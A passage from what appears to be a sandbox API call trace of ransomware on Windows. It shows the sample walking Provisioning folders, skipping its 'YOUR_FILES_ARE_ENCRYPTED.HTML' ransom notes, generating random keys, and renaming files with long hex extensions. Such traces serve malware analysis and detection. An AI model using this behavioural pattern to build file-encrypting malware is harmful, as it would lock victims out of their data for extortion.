Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml.E817B911CF4E9B462C2F3AA22DC733F3E56499826724160357A4EAEFC4CA3535") returned 168 [0110.159] PathFindExtensionW (pszPath="customizations.xml.E817B911CF4E9B462C2F3AA22DC733F3E56499826724160357A4EAEFC4CA3535") returned=".E817B911CF4E9B462C2F3AA22DC733F3E56499826724160357A4EAEFC4CA3535" [0110.159] lstrlenW (lpString=".E817B911CF4E9B462C2F3AA22DC733F3E56499826724160357A4EAEFC4CA3535") returned 65 [0110.159] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9fd4d57, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9fd4d57, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9fd4d57, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0110.159] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.159] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml") returned 104 [0110.159] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.159] lstrlenW (lpString=".xml") returned 4 [0110.159] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.160] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0110.160] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=271) returned 1 [0110.160] CloseHandle (hObject=0x30c) returned 1 [0110.160] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaefa59ac, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefa59ac, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="Prov", cAlternateFileName="")) returned 1 [0110.160] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.160] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov") returned 89 [0110.160] GetProcessHeap () returned 0x600000 [0110.160] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.161] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov" [0110.161] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*" [0110.161] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaefa59ac, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefae26b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.161] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaefa59ac, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefae26b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0110.161] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime", cAlternateFileName="")) returned 1 [0110.161] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.161] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime") returned 97 [0110.161] GetProcessHeap () returned 0x600000 [0110.161] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.162] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime" [0110.162] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*" [0110.162] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaef8fa2f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3d1c, dwReserved1=0x6f3c68, cFileName=".", cAlternateFileName="")) returned 0x626638 [0110.162] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaef8fa2f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3d1c, dwReserved1=0x6f3c68, cFileName="..", cAlternateFileName="")) returned 1 [0110.162] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e574f3, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9e574f3, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9e7d76e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x19aa, dwReserved0=0x6f3d1c, dwReserved1=0x6f3c68, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0110.162] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.162] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml") returned 113 [0110.162] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.162] lstrlenW (lpString=".provxml") returned 8 [0110.162] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.162] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e7d76e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9e7d76e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9e7d76e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x586, dwReserved0=0x6f3d1c, dwReserved1=0x6f3c68, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1 [0110.162] StrStrIW (lpFirst="Power_1.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.163] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml") returned 113 [0110.163] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0110.163] lstrlenW (lpString=".provxml") returned 8 [0110.163] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0110.163] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9ec9c48, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9ec9c48, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9ec9c48, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1018, dwReserved0=0x6f3d1c, dwReserved1=0x6f3c68, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 1 [0110.163] StrStrIW (lpFirst="Power_2.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.163] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml") returned 113 [0110.163] PathFindExtensionW (pszPath="Power_2.provxml") returned=".provxml" [0110.163] lstrlenW (lpString=".provxml") returned 8 [0110.163] PathFindExtensionW (pszPath="Power_2.provxml") returned=".provxml" [0110.163] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9f16127, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9f16127, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9f16127, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1939, dwReserved0=0x6f3d1c, dwReserved1=0x6f3c68, cFileName="Power_3.provxml", cAlternateFileName="POWER_~4.PRO")) returned 1 [0110.163] StrStrIW (lpFirst="Power_3.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.163] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml") returned 113 [0110.163] PathFindExtensionW (pszPath="Power_3.provxml") returned=".provxml" [0110.163] lstrlenW (lpString=".provxml") returned 8 [0110.163] PathFindExtensionW (pszPath="Power_3.provxml") returned=".provxml" [0110.163] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9f62605, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9f62605, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9f62605, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1939, dwReserved0=0x6f3d1c, dwReserved1=0x6f3c68, cFileName="Power_4.provxml", cAlternateFileName="PO21B6~1.PRO")) returned 1 [0110.163] StrStrIW (lpFirst="Power_4.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.163] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml") returned 113 [0110.163] PathFindExtensionW (pszPath="Power_4.provxml") returned=".provxml" [0110.163] lstrlenW (lpString=".provxml") returned 8 [0110.163] PathFindExtensionW (pszPath="Power_4.provxml") returned=".provxml" [0110.163] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9f88875, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9f88875, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9f88875, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x6f3d1c, dwReserved1=0x6f3c68, cFileName="Power_5.provxml", cAlternateFileName="PO5EBD~1.PRO")) returned 1 [0110.163] StrStrIW (lpFirst="Power_5.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.163] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml") returned 113 [0110.163] PathFindExtensionW (pszPath="Power_5.provxml") returned=".provxml" [0110.163] lstrlenW (lpString=".provxml") returned 8 [0110.163] PathFindExtensionW (pszPath="Power_5.provxml") returned=".provxml" [0110.163] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9faeae8, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9faeae8, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9faeae8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x757, dwReserved0=0x6f3d1c, dwReserved1=0x6f3c68, cFileName="Power_6.provxml", cAlternateFileName="PO805B~1.PRO")) returned 1 [0110.163] StrStrIW (lpFirst="Power_6.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.163] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml") returned 113 [0110.163] PathFindExtensionW (pszPath="Power_6.provxml") returned=".provxml" [0110.163] lstrlenW (lpString=".provxml") returned 8 [0110.163] PathFindExtensionW (pszPath="Power_6.provxml") returned=".provxml" [0110.164] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9faeae8, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9faeae8, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9faeae8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x93f, dwReserved0=0x6f3d1c, dwReserved1=0x6f3c68, cFileName="Power_7.provxml", cAlternateFileName="POFE19~1.PRO")) returned 1 [0110.164] StrStrIW (lpFirst="Power_7.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.164] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_7.provxml") returned 113 [0110.164] PathFindExtensionW (pszPath="Power_7.provxml") returned=".provxml" [0110.164] lstrlenW (lpString=".provxml") returned 8 [0110.164] PathFindExtensionW (pszPath="Power_7.provxml") returned=".provxml" [0110.164] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef8fa2f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaef8fa2f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef934e2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f3d1c, dwReserved1=0x6f3c68, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.164] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef8fa2f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaef8fa2f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaef934e2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f3d1c, dwReserved1=0x6f3c68, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.164] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0110.164] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0110.164] GetProcessHeap () returned 0x600000 [0110.164] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.164] GetProcessHeap () returned 0x600000 [0110.164] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.164] GetProcessHeap () returned 0x600000 [0110.164] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.165] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e7d76e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9e7d76e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaefa96d0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x5d3, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime.xml.2BCBE6422FDEF6778DC2AB1B655D664513B2EE5E2F1745751DCF7D02C464026A", cAlternateFileName="RUNTIM~1.2BC")) returned 1 [0110.165] StrStrIW (lpFirst="RunTime.xml.2BCBE6422FDEF6778DC2AB1B655D664513B2EE5E2F1745751DCF7D02C464026A", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.165] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml.2BCBE6422FDEF6778DC2AB1B655D664513B2EE5E2F1745751DCF7D02C464026A") returned 166 [0110.165] PathFindExtensionW (pszPath="RunTime.xml.2BCBE6422FDEF6778DC2AB1B655D664513B2EE5E2F1745751DCF7D02C464026A") returned=".2BCBE6422FDEF6778DC2AB1B655D664513B2EE5E2F1745751DCF7D02C464026A" [0110.165] lstrlenW (lpString=".2BCBE6422FDEF6778DC2AB1B655D664513B2EE5E2F1745751DCF7D02C464026A") returned 65 [0110.165] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefabb67, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaefabb67, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefb1d1b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.165] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefabb67, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaefabb67, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefb1d1b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.165] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.165] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0110.166] GetProcessHeap () returned 0x600000 [0110.166] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.166] GetProcessHeap () returned 0x600000 [0110.166] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.166] GetProcessHeap () returned 0x600000 [0110.166] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.167] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefb6b20, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaefb6b20, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefb9219, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.167] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefb6b20, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaefb6b20, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaefb9219, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.167] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.167] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0110.167] 